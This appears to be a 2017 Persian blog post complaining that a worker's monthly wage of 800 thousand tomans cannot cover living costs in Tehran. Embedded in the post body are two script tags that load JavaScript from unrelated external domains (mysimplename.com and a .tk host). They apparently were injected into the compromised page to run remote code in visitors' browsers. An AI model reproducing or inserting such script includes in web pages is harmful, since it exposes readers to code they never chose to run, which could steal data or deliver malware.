مسئولین ، با 800 هزارتومن چگونه میشود زندگی کرد؟


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>آیا با 800هزار تومان می‌توان در تهران زندگی کرد؟ / حقوق قشر کارگری جامعه بسیار کم و ناچیز است؛ به گونه‌ای که این دستمزد به میانه ماه نرسیده تمام می‌شود.

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0
ارسال در 1395/11/28 ساعت 09:18 2017-2-16 08:18:47
mohsen
توسط mohsen


عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر